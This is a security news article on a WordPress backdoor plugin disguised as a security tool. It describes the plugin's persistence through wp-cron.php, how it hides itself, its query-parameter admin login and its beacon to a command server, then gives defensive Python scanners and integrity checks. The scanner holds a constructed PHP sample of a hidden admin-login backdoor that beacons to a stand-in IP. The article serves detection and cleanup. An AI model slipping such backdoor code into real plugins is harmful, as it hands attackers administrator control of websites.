
Hidden Threat Behind a Fake Security Tool: WordPress Plugin Malware Takes Full Control of Your Site
WordPress is one of the most popular platforms for building websites, powering millions of sites worldwide due to its ease of use and extensive customization options. However, its widespread adoption also makes it a prime target for cybersecurity threats. A recently discovered piece of malware serves as a stark example of these risks.
On January 22, 2025, Wordfence researchers, during a routine analysis, found malicious code in what was presented as a legitimate security plugin. The file carries an innocuous name such as WP-antymalwary-bot.php or wp-performance-booster.php, and behind that name sits functionality that gives an attacker complete control of the site.
Far from being a benign security tool, this plugin acts as a hidden backdoor, providing hackers with a range of dangerous capabilities, including:
- Executing arbitrary code remotely.
- Granting administrator privileges.
- Injecting malicious JavaScript for serving unwanted advertisements or other fraudulent activities.
One of the plugin’s most alarming features is its ability to persist on a site even after apparent removal. It achieves this by modifying wp-cron.php, the core WordPress file that runs scheduled tasks: on each cron run the added code checks whether the plugin file is still present and recreates it if it has been deleted. As a result, administrators may believe they have eliminated the threat, only for it to reappear covertly. Deleting the plugin file alone is therefore not a cleanup; the modified core file has to be restored from a clean copy as well, and because wp-cron.php is a core file, a checksum comparison against the pristine WordPress release flags the modification immediately.
The plugin further evades detection by hiding itself from the list of installed plugins in the WordPress admin dashboard, so an administrator reviewing that page does not see it. Hiding from the list does not deactivate anything: the plugin file is still present under wp-content/plugins and still referenced by the active_plugins option, so the file system and the database, not the dashboard, are the reliable places to look. This is accomplished through the following code:

Additionally, the plugin includes an emergency login function that bypasses the normal login flow. By sending a request with a specific query parameter, an attacker is logged in as an administrator without ever touching wp-login.php, so controls that watch that endpoint, such as brute-force limits and login alerts, have nothing to observe and the site owner is not alerted. The function is shown in this code snippet:

The malicious plugin communicates with a Command and Control (C&C) server every minute, sending the infected site’s URL and a timestamp. This lets the operators maintain an up-to-date inventory of compromised sites and orchestrate simultaneous actions across all of them. The C&C server is believed to be located in Cyprus. On the server side, an outbound request from the web server to a bare IP address once a minute is itself a strong indicator: egress logs, or a firewall policy restricting outbound connections from the web tier, catch this regardless of how the PHP is obfuscated.
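The three behaviours described above (self-removal from the plugin list, a query-parameter login, a beacon to a hard-coded address) leave recognisable traces in plugin source. The following is an added example of a triage scanner for those traces; it is not Wordfence's signature logic and not the malware's code. Both PHP samples are constructed for this page: the "suspect" one mimics the described behaviours in the simplest form, the "benign" one reads a query parameter without touching authentication, and the address 203.0.113.10 is from the documentation range.

```python
import re

# Constructed sample in the style the article describes: the plugin removes
# itself from the admin plugin list, logs a visitor in as an administrator when
# a particular query parameter is present, and checks in to a hard-coded
# address. Written for this page as an illustration; not the malware's source.
SUSPECT_PLUGIN = r"""<?php
/* Plugin Name: WP Performance Booster */
add_filter('all_plugins', function ($plugins) {
    unset($plugins[plugin_basename(__FILE__)]);
    return $plugins;
});
function emergency_login() {
    if (isset($_GET['emergency_login']) && $_GET['emergency_login'] === 'secret') {
        $admins = get_users(['role' => 'administrator', 'number' => 1]);
        wp_set_current_user($admins[0]->ID);
        wp_set_auth_cookie($admins[0]->ID);
    }
}
add_action('init', 'emergency_login');
add_action('init', function () {
    wp_remote_get('http://203.0.113.10/ping?site=' . urlencode(home_url()) . '&t=' . time());
});
"""

# Constructed benign plugin: reads a query parameter but never touches auth state.
BENIGN_PLUGIN = r"""<?php
/* Plugin Name: Campaign Tracker */
add_action('init', function () {
    if (isset($_GET['utm_source'])) {
        update_option('last_utm', sanitize_text_field($_GET['utm_source']));
    }
});
"""

ALL_PLUGINS_FILTER = re.compile(r"add_filter\(\s*['\"]all_plugins['\"]")
REQUEST_PARAM = re.compile(r"\$_(GET|REQUEST|POST)\s*\[")
LITERAL_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}")
AUTH_CALLS = ("wp_set_auth_cookie(", "wp_set_current_user(", "wp_signon(")


def scan_plugin_source(src, window=8):
    """Return (indicator, detail) pairs for the three behaviours; [] if none.
    Heuristic text matching, not a PHP parser: treat hits as triage leads."""
    findings = []
    lines = src.splitlines()

    # 1. Self-removal from the plugin list: an all_plugins filter whose callback
    #    unsets an entry. Legitimate plugins very rarely need this.
    m = ALL_PLUGINS_FILTER.search(src)
    if m and "unset(" in src[m.end():m.end() + 600]:
        findings.append(("hidden-plugin", "all_plugins filter unsets a plugin entry"))

    # 2. A request parameter read within `window` lines of a call that creates a
    #    logged-in session: authentication driven by URL input, not by wp-login.
    for i, line in enumerate(lines):
        if REQUEST_PARAM.search(line):
            nearby = "\n".join(lines[i:i + window])
            hit = next((c for c in AUTH_CALLS if c in nearby), None)
            if hit:
                findings.append(("param-login", f"{hit}) near request parameter at line {i + 1}"))
                break

    # 3. HTTP request to a hard-coded IP literal: typical of a check-in beacon.
    m = LITERAL_IP_URL.search(src)
    if m:
        findings.append(("beacon", f"request to literal address {m.group(0)}"))
    return findings


if __name__ == "__main__":
    for name, src in (("suspect", SUSPECT_PLUGIN), ("benign", BENIGN_PLUGIN)):
        print(name, scan_plugin_source(src))
```

Run it over every .php file under wp-content/plugins and wp-content/mu-plugins, not only the ones the dashboard lists. The checks are deliberately loose (a parameter near an auth call, an IP in a URL), so expect occasional hits in legitimate code and review them by hand; the point is to surface files worth reading, which a hidden plugin by design never is.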
Upon identifying this threat, Wordfence promptly developed detection signatures and released them to premium users on January 24, 2025. Users of the free version are scheduled to receive this protection by May 23, 2025.
Many website owners assume that installing a “security plugin” guarantees safety. However, this incident underscores that even plugins marketed as protective can harbor serious threats.
For this reason, it is critical to vet any plugin before installation: install only from the official WordPress plugin directory or the vendor’s own site, and check its source, reviews, update history, and user feedback. After installation, regular file-integrity checks matter more than trusting the dashboard, because a plugin that filters itself out of the list is invisible there but not on disk. WP-CLI’s wp core verify-checksums and wp plugin verify-checksums --all compare installed files against the hashes published by WordPress.org, which catches both a modified wp-cron.php and tampered plugin files; scheduled scans and monitoring of core files should be standard practice for every site owner.
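The persistence mechanism described earlier (a respawn stub added to wp-cron.php) and the file-monitoring advice above come down to the same check: hash the live files and compare them with a manifest taken from a clean copy of the same release. The following is an added example of that check, not Wordfence's tooling and not WP-CLI; the file contents, the appended stub and the dropped plugin path are constructed stand-ins so the example runs offline in a temporary directory.

```python
import hashlib
import os
import tempfile

# Constructed stand-ins for core files. In practice the manifest is built from
# the unmodified WordPress release archive for the exact installed version.
PRISTINE_FILES = {
    "wp-cron.php": "<?php\nrequire_once __DIR__ . '/wp-load.php';\nwp_cron();\n",
    "wp-load.php": "<?php\n// bootstrap (constructed)\n",
    "wp-content/plugins/hello.php": "<?php\n/* Plugin Name: Hello */\n",
}

# Constructed tampering modelled on the article: code appended to wp-cron.php so
# that every cron run restores the plugin file if it has been deleted.
RESPAWN_STUB = (
    "\n// attacker-added respawn stub (constructed illustration)\n"
    "if (!file_exists(WP_PLUGIN_DIR . '/wp-performance-booster.php')) {\n"
    "    // re-create the plugin file here\n"
    "}\n"
)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def write_tree(root, files):
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(content)


def build_manifest(root, rel_paths):
    """SHA-256 of each listed file relative to root; take this from a clean install."""
    return {rel: sha256_file(os.path.join(root, *rel.split("/"))) for rel in rel_paths}


def verify_integrity(root, manifest):
    """Compare the live tree with the manifest.
    modified: hash differs; missing: in manifest but not on disk;
    unexpected: .php files on disk the manifest does not know about (dropped files)."""
    modified, missing, unexpected = [], [], []
    for rel, digest in manifest.items():
        path = os.path.join(root, *rel.split("/"))
        if not os.path.isfile(path):
            missing.append(rel)
        elif sha256_file(path) != digest:
            modified.append(rel)
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            if rel.endswith(".php") and rel not in manifest:
                unexpected.append(rel)
    return {"modified": sorted(modified), "missing": sorted(missing), "unexpected": sorted(unexpected)}


def demo():
    """Stage a clean tree, record its manifest, apply the constructed tampering, re-verify."""
    with tempfile.TemporaryDirectory() as root:
        write_tree(root, PRISTINE_FILES)
        manifest = build_manifest(root, PRISTINE_FILES.keys())
        clean = verify_integrity(root, manifest)
        assert clean == {"modified": [], "missing": [], "unexpected": []}
        # Tamper: append the respawn stub and drop the plugin file it re-creates.
        with open(os.path.join(root, "wp-cron.php"), "a") as f:
            f.write(RESPAWN_STUB)
        write_tree(root, {"wp-content/plugins/wp-performance-booster.php": "<?php\n// dropped file (constructed)\n"})
        return verify_integrity(root, manifest)


if __name__ == "__main__":
    print(demo())
```

The modified wp-cron.php shows up even though the plugin list shows nothing, which is why a respawning infection is caught by integrity checks rather than by the dashboard. On a real site, wp core verify-checksums does the core-file part of this against WordPress.org’s published hashes; the unexpected-file pass is worth keeping, since a clean core check says nothing about a file dropped into a plugin directory.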